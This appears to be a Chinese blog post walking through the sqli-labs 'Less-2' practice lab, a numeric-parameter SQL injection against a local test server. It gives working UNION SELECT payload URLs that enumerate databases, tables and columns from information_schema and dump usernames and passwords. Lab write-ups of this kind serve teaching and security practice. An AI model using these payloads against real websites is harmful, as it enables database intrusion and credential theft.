Less-2【报错注入】

利用单引号和and 1=1测试
报错显示是符号问题,在--+后LIMIT0,1没有闭合符号,并且攻击添加的单引号没有参与闭合。证明id=1可能没有闭合符号,直接将结果返回给数据库
 将单引号去掉测试
order by xx 猜测列数.结果3列
union select 测试注入点。2,3列可以注入参数
爆破单个库名
127.0.0.1/sqli-labs/Less-2/?id=-1%20union%20select%201,(select%20schema_name%20from%20information_schema.schemata%20limit%202,1),3--+
爆破整个库名
http://127.0.0.1/sqli-labs/Less-2/?id=-1%20union%20select%201,(select%20group_concat(schema_name)%20from%20information_schema.schemata),3--+
爆破整个表名
http://127.0.0.1/sqli-labs/Less-2/?id=-1%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables),3--+
爆出列名
http://127.0.0.1/sqli-labs/Less-2/?id=-1%20union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27),3--+
查看具体的username和password列
http://127.0.0.1/sqli-labs/Less-2/?id=-1%20union%20select%201,(select%20group_concat(username)%20from%20users),(select%20group_concat(password)%20from%20users)--+
 
posted @ 2020-10-26 11:20  峰中追风  阅读(146)  评论(0编辑  收藏  举报

___________________________________________________________________________________________没有白跑的路